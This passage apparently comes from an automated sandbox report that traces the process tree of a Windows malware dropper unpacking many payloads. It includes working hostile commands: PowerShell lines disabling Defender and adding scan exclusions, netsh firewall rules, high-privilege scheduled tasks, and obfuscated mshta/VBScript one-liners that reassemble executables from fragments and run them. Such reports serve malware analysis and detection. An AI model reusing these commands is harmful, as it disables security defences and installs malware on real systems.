4⤵
- Suspicious use of WriteProcessMemory
PID:2020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2224

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
4⤵
- Suspicious use of WriteProcessMemory
PID:2092

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2276

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09ed6b36e57df5f.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2880

C:\Users\Admin\AppData\Local\Temp\7zS8F9DE174\Wed09ed6b36e57df5f.exe
Wed09ed6b36e57df5f.exe
5⤵
- Executes dropped EXE
PID:4756

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0944361c3621a67a6.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4484

C:\Users\Admin\AppData\Local\Temp\7zS8F9DE174\Wed0944361c3621a67a6.exe
Wed0944361c3621a67a6.exe
5⤵
- Executes dropped EXE
PID:4036

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0900caa0501dc98f.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3976

C:\Users\Admin\AppData\Local\Temp\7zS8F9DE174\Wed0900caa0501dc98f.exe
Wed0900caa0501dc98f.exe
5⤵
- Executes dropped EXE
PID:3720

C:\Users\Admin\Pictures\Adobe Films\8uLRgNZ6Niuj_H8G31PyPiDc.exe
"C:\Users\Admin\Pictures\Adobe Films\8uLRgNZ6Niuj_H8G31PyPiDc.exe"
6⤵
- Executes dropped EXE
PID:2248

C:\Users\Admin\Pictures\Adobe Films\rsL86slx0Ojy5qVIZaVs26uz.exe
"C:\Users\Admin\Pictures\Adobe Films\rsL86slx0Ojy5qVIZaVs26uz.exe"
6⤵
PID:5740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 296
7⤵
- Program crash
PID:5168

C:\Users\Admin\Pictures\Adobe Films\Tn03aNNyoIBuL_GZWFA0rYXT.exe
"C:\Users\Admin\Pictures\Adobe Films\Tn03aNNyoIBuL_GZWFA0rYXT.exe"
6⤵
PID:5712

C:\Users\Admin\Pictures\Adobe Films\etPzOqRZumUTHC3v0VREnGqS.exe
"C:\Users\Admin\Pictures\Adobe Films\etPzOqRZumUTHC3v0VREnGqS.exe"
6⤵
PID:5692

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
PID:6124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5692 -s 564
7⤵
- Program crash
PID:1932

C:\Users\Admin\Pictures\Adobe Films\RVY9xi2BJ0nDzgb2mNbDSYCm.exe
"C:\Users\Admin\Pictures\Adobe Films\RVY9xi2BJ0nDzgb2mNbDSYCm.exe"
6⤵
PID:2980

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
7⤵
- Creates scheduled task(s)
PID:5684

C:\Users\Admin\Documents\7eYnDfmSPUOKL9IkITXJqQ2f.exe
"C:\Users\Admin\Documents\7eYnDfmSPUOKL9IkITXJqQ2f.exe"
7⤵
PID:5708

C:\Users\Admin\Pictures\Adobe Films\uBMtXFaLhj245Kr_I6C5bCIk.exe
"C:\Users\Admin\Pictures\Adobe Films\uBMtXFaLhj245Kr_I6C5bCIk.exe"
8⤵
PID:3428

C:\Users\Admin\Pictures\Adobe Films\h6uPTfsjnuoq0zwUQ93NX0DF.exe
"C:\Users\Admin\Pictures\Adobe Films\h6uPTfsjnuoq0zwUQ93NX0DF.exe"
8⤵
PID:5896

C:\Users\Admin\Pictures\Adobe Films\LQ07KTyrG5NjUJeS970zrCHE.exe
"C:\Users\Admin\Pictures\Adobe Films\LQ07KTyrG5NjUJeS970zrCHE.exe"
8⤵
PID:2560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 232
9⤵
- Program crash
PID:2344

C:\Users\Admin\Pictures\Adobe Films\01_R5njpACaEFadqm6uaDXRu.exe
"C:\Users\Admin\Pictures\Adobe Films\01_R5njpACaEFadqm6uaDXRu.exe"
8⤵
PID:5236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5236 -s 296
9⤵
- Program crash
PID:4360

C:\Users\Admin\Pictures\Adobe Films\2hQ3FLBs5b2dIjhPIJmp_TUP.exe
"C:\Users\Admin\Pictures\Adobe Films\2hQ3FLBs5b2dIjhPIJmp_TUP.exe"
8⤵
PID:4588

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\2hQ3FLBs5b2dIjhPIJmp_TUP.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\2hQ3FLBs5b2dIjhPIJmp_TUP.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
9⤵
PID:4984

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\2hQ3FLBs5b2dIjhPIJmp_TUP.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\2hQ3FLBs5b2dIjhPIJmp_TUP.exe" ) do taskkill -f -iM "%~NxM"
10⤵
PID:5964

C:\Users\Admin\Pictures\Adobe Films\5XwDAmf2uWfVMQNaVuZGKMyn.exe
"C:\Users\Admin\Pictures\Adobe Films\5XwDAmf2uWfVMQNaVuZGKMyn.exe"
8⤵
PID:1492

C:\Users\Admin\Pictures\Adobe Films\zmwyvZtrseZgmxgLNuq8PxWh.exe
"C:\Users\Admin\Pictures\Adobe Films\zmwyvZtrseZgmxgLNuq8PxWh.exe"
8⤵
PID:5612

C:\Users\Admin\Pictures\Adobe Films\CiTlJkywWijeUKNJBucWxdPb.exe
"C:\Users\Admin\Pictures\Adobe Films\CiTlJkywWijeUKNJBucWxdPb.exe"
8⤵
PID:4084

C:\Users\Admin\Pictures\Adobe Films\wHtW5bDCPAVOvMFQzg0cKzmU.exe
"C:\Users\Admin\Pictures\Adobe Films\wHtW5bDCPAVOvMFQzg0cKzmU.exe"
8⤵
PID:3124

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
7⤵
- Creates scheduled task(s)
PID:4840

C:\Users\Admin\Pictures\Adobe Films\qiKBSo5kUxhCbqnIz0EhkzEE.exe
"C:\Users\Admin\Pictures\Adobe Films\qiKBSo5kUxhCbqnIz0EhkzEE.exe"
6⤵
PID:2736

C:\Program Files (x86)\Company\NewProduct\cutm3.exe
"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
7⤵
PID:4472

C:\Users\Admin\Pictures\Adobe Films\ENRTOqTMin7yIA6PpBRN_Wn1.exe
"C:\Users\Admin\Pictures\Adobe Films\ENRTOqTMin7yIA6PpBRN_Wn1.exe"
6⤵
PID:5700

C:\Users\Admin\Pictures\Adobe Films\fPWT19EoS1TDn8JZbiu1OgTi.exe
"C:\Users\Admin\Pictures\Adobe Films\fPWT19EoS1TDn8JZbiu1OgTi.exe"
6⤵
PID:1812

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
PID:5624

C:\Users\Admin\Pictures\Adobe Films\kS6ZiIWPRhz8I9ikkxsRe152.exe
"C:\Users\Admin\Pictures\Adobe Films\kS6ZiIWPRhz8I9ikkxsRe152.exe"
6⤵
PID:5228

C:\Users\Admin\AppData\Roaming\1328206.exe
"C:\Users\Admin\AppData\Roaming\1328206.exe"
7⤵
PID:5592

C:\Users\Admin\AppData\Roaming\7632504.exe
"C:\Users\Admin\AppData\Roaming\7632504.exe"
7⤵
PID:1464

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
8⤵
PID:6000

C:\Users\Admin\AppData\Roaming\2662196.exe
"C:\Users\Admin\AppData\Roaming\2662196.exe"
7⤵
PID:5636

C:\Users\Admin\AppData\Roaming\4456652.exe
"C:\Users\Admin\AppData\Roaming\4456652.exe"
7⤵
PID:5292

C:\Users\Admin\AppData\Roaming\8065188.exe
"C:\Users\Admin\AppData\Roaming\8065188.exe"
7⤵
PID:4564

C:\Users\Admin\AppData\Roaming\8820182.exe
"C:\Users\Admin\AppData\Roaming\8820182.exe"
7⤵
PID:5880

C:\Users\Admin\AppData\Roaming\2585314.exe
"C:\Users\Admin\AppData\Roaming\2585314.exe"
7⤵
PID:5504

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscRIpT:cLosE ( cREaTeOBjeCT ("wsCriPT.sHELl"). rUN ("Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Roaming\2585314.exe"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If """"== """" for %k In ( ""C:\Users\Admin\AppData\Roaming\2585314.exe"" ) do taskkill /F /Im ""%~Nxk"" " ,0 , trUE) )
8⤵
PID:5168

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Roaming\2585314.exe"> kSTw_GRvR1eDFi.EXE&&StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ&If ""== "" for %k In ( "C:\Users\Admin\AppData\Roaming\2585314.exe" ) do taskkill /F /Im "%~Nxk"
9⤵
PID:5900

C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE
kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ
10⤵
PID:3084

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscRIpT:cLosE ( cREaTeOBjeCT ("wsCriPT.sHELl"). rUN ("Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If ""/P6l3hjJm2mK1sJpxUmLJ""== """" for %k In ( ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" ) do taskkill /F /Im ""%~Nxk"" " ,0 , trUE) )
11⤵
PID:4604

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"> kSTw_GRvR1eDFi.EXE&&StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ&If "/P6l3hjJm2mK1sJpxUmLJ"== "" for %k In ( "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE" ) do taskkill /F /Im "%~Nxk"
12⤵
PID:5176

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBscrIPT: cLOSE( cREATEobjeCt ( "WSCRIPt.SheLL" ). ruN ( "C:\Windows\system32\cmd.exe /q /C echo %DatE%cl1V> 8KyK.ZNp & Echo | sET /P = ""MZ"" > hXUPL.XH& CoPY /b /Y HXUPL.XH + QR7i5Ur.BRU +wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM & StArT control .\GKq1GTV.ZnM " , 0 , TrUe ) )
11⤵
PID:5788

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C echo ÚtE%cl1V>8KyK.ZNp & Echo | sET /P = "MZ" >hXUPL.XH& CoPY /b /Y HXUPL.XH +QR7i5Ur.BRU +wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM& StArT control .\GKq1GTV.ZnM
12⤵
PID:5960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>hXUPL.XH"
13⤵
PID:2916

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Echo "
13⤵
PID:4092

C:\Windows\SysWOW64\control.exe
control .\GKq1GTV.ZnM
13⤵
PID:5552

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\GKq1GTV.ZnM
14⤵
PID:5516

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /Im "2585314.exe"
10⤵
- Kills process with taskkill
PID:2624

C:\Users\Admin\Pictures\Adobe Films\v_gPJHTZicC0QKetR7DdR9GX.exe
"C:\Users\Admin\Pictures\Adobe Films\v_gPJHTZicC0QKetR7DdR9GX.exe"
6⤵
PID:5280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5280 -s 296
7⤵
- Program crash
PID:3124

C:\Users\Admin\Pictures\Adobe Films\dCEhWK2Vv3JaDZ_nfaRPCnuf.exe
"C:\Users\Admin\Pictures\Adobe Films\dCEhWK2Vv3JaDZ_nfaRPCnuf.exe"
6⤵
PID:5428

C:\Users\Admin\Pictures\Adobe Films\dCEhWK2Vv3JaDZ_nfaRPCnuf.exe
"C:\Users\Admin\Pictures\Adobe Films\dCEhWK2Vv3JaDZ_nfaRPCnuf.exe"
7⤵
PID:1412

C:\Users\Admin\Pictures\Adobe Films\YHGffCS5fjrfTHHeKwpla0GZ.exe
"C:\Users\Admin\Pictures\Adobe Films\YHGffCS5fjrfTHHeKwpla0GZ.exe"
6⤵
PID:5516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5516 -s 300
7⤵
- Program crash
PID:1592

C:\Users\Admin\Pictures\Adobe Films\Kwnybn4TViu2OZA2N_AQkPBw.exe
"C:\Users\Admin\Pictures\Adobe Films\Kwnybn4TViu2OZA2N_AQkPBw.exe"
6⤵
PID:932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 932 -s 276
7⤵
- Program crash
PID:3432

C:\Users\Admin\Pictures\Adobe Films\YxkrtS5eWMAryWIlumnfeyOr.exe
"C:\Users\Admin\Pictures\Adobe Films\YxkrtS5eWMAryWIlumnfeyOr.exe"
6⤵
PID:2560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 2004
7⤵
- Program crash
PID:2308

C:\Users\Admin\Pictures\Adobe Films\fim909tgi5byT1ZiQWAhJClM.exe
"C:\Users\Admin\Pictures\Adobe Films\fim909tgi5byT1ZiQWAhJClM.exe"
6⤵
PID:5904

C:\Users\Admin\Pictures\Adobe Films\1rdKDSa584uRrskyF8m7ILEW.exe
"C:\Users\Admin\Pictures\Adobe Films\1rdKDSa584uRrskyF8m7ILEW.exe"
6⤵
PID:5856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 300
7⤵
- Program crash
PID:5964

C:\Users\Admin\Pictures\Adobe Films\gxwwbhPg4Z7mnndxCmcdg0QI.exe
"C:\Users\Admin\Pictures\Adobe Films\gxwwbhPg4Z7mnndxCmcdg0QI.exe"
6⤵
PID:5948

C:\Users\Admin\Pictures\Adobe Films\Ak7yqeLZifsHDQTdYo82R2N6.exe
"C:\Users\Admin\Pictures\Adobe Films\Ak7yqeLZifsHDQTdYo82R2N6.exe"
6⤵
PID:1492

C:\Users\Admin\Pictures\Adobe Films\LBPvYfkCEmE69qvjhC76XX3S.exe
"C:\Users\Admin\Pictures\Adobe Films\LBPvYfkCEmE69qvjhC76XX3S.exe"
6⤵
PID:1076

C:\Users\Admin\Pictures\Adobe Films\tS_w78TjfVL76_fn91te0Xao.exe
"C:\Users\Admin\Pictures\Adobe Films\tS_w78TjfVL76_fn91te0Xao.exe"
6⤵
PID:6020

C:\Users\Admin\Pictures\Adobe Films\5LL6NvcoZ1eL5_f8WdwOorpX.exe
"C:\Users\Admin\Pictures\Adobe Films\5LL6NvcoZ1eL5_f8WdwOorpX.exe"
6⤵
PID:4680

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
7⤵
PID:4048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
7⤵
PID:5992

C:\Windows\SYSTEM32\schtasks.exe
schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
7⤵
- Creates scheduled task(s)
PID:3532

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
7⤵
PID:5428

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
7⤵
PID:4092

C:\Windows\System\svchost.exe
"C:\Windows\System\svchost.exe" formal
7⤵
PID:5012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
8⤵
PID:3704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
8⤵
PID:5524

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
8⤵
PID:2444

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
8⤵
PID:5900

C:\Users\Admin\Pictures\Adobe Films\LizFK6BaRcLDbjiC4Z0R1b2X.exe
"C:\Users\Admin\Pictures\Adobe Films\LizFK6BaRcLDbjiC4Z0R1b2X.exe"
6⤵
PID:5372

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\LizFK6BaRcLDbjiC4Z0R1b2X.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\LizFK6BaRcLDbjiC4Z0R1b2X.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
7⤵
PID:5776

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\LizFK6BaRcLDbjiC4Z0R1b2X.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\LizFK6BaRcLDbjiC4Z0R1b2X.exe" ) do taskkill -im "%~NxK" -F
8⤵
PID:2916

C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
9⤵
PID:5596

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
10⤵
PID:5788

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
11⤵
PID:4532

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )
10⤵
PID:3208

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
11⤵
PID:1848

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
12⤵
PID:2344

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHO "
12⤵
PID:2128

C:\Windows\SysWOW64\taskkill.exe
taskkill -im "LizFK6BaRcLDbjiC4Z0R1b2X.exe" -F
9⤵
- Kills process with taskkill
PID:2872

C:\Users\Admin\Pictures\Adobe Films\vQt3JhHu9pS3fDZCBqM7K2f7.exe
"C:\Users\Admin\Pictures\Adobe Films\vQt3JhHu9pS3fDZCBqM7K2f7.exe"
6⤵
PID:2644

C:\Users\Admin\Pictures\Adobe Films\TMYhcfuL8KNWSs6Cn8m3HbuU.exe
"C:\Users\Admin\Pictures\Adobe Films\TMYhcfuL8KNWSs6Cn8m3HbuU.exe"
6⤵
PID:1692

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
7⤵
PID:5504

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed090db89ca4c58.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2736

C:\Users\Admin\AppData\Local\Temp\7zS8F9DE174\Wed090db89ca4c58.exe
Wed090db89ca4c58.exe
5⤵
- Executes dropped EXE
PID:4360

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS8F9DE174\Wed090db89ca4c58.exe"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8F9DE174\Wed090db89ca4c58.exe"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
6⤵
PID:1888

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zS8F9DE174\Wed090db89ca4c58.exe" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zS8F9DE174\Wed090db89ca4c58.exe" ) do taskkill /f -IM "%~nXN"
7⤵
PID:1404

C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE
..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA
8⤵
- Executes dropped EXE
PID:2316

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
9⤵
PID:1920

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"
10⤵
PID:1792

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct( "wSCRIPT.SHEll").RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W ",0 , True ))
9⤵
PID:5396

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81&CopY /y /B PUVMYbl.81 +B0zcQ1x.o +490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W&Del /Q *& StaRT msiexec /y ..\_enU.W
10⤵
PID:5468

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eChO "
11⤵
PID:5548

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"
11⤵
PID:5588

C:\Windows\SysWOW64\msiexec.exe
msiexec /y ..\_enU.W
11⤵
- Loads dropped DLL
PID:5772

C:\Windows\SysWOW64\taskkill.exe
taskkill /f -IM "Wed090db89ca4c58.exe"
8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1592

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0983917533e.exe
4⤵
PID:3680

C:\Users\Admin\AppData\Local\Temp\7zS8F9DE174\Wed0983917533e.exe
Wed0983917533e.exe
5⤵
- Executes dropped EXE
PID:5040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 244
6⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1248

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09d761ab4704dd931.exe
4⤵
PID:3480

C:\Users\Admin\AppData\Local\Temp\7zS8F9DE174\Wed09d761ab4704dd931.exe
Wed09d761ab4704dd931.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2164

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09f69eef9c0d5b.exe
4⤵
PID:1620

C:\Users\Admin\AppData\Local\Temp\7zS8F9DE174\Wed09f69eef9c0d5b.exe
Wed09f69eef9c0d5b.exe
5⤵
- Executes dropped EXE
PID:3376

C:\Users\Admin\AppData\Local\Temp\is-MBJQ0.tmp\Wed09f69eef9c0d5b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MBJQ0.tmp\Wed09f69eef9c0d5b.tmp" /SL5="$300D4,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8F9DE174\Wed09f69eef9c0d5b.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1372

C:\Users\Admin\AppData\Local\Temp\7zS8F9DE174\Wed09f69eef9c0d5b.exe
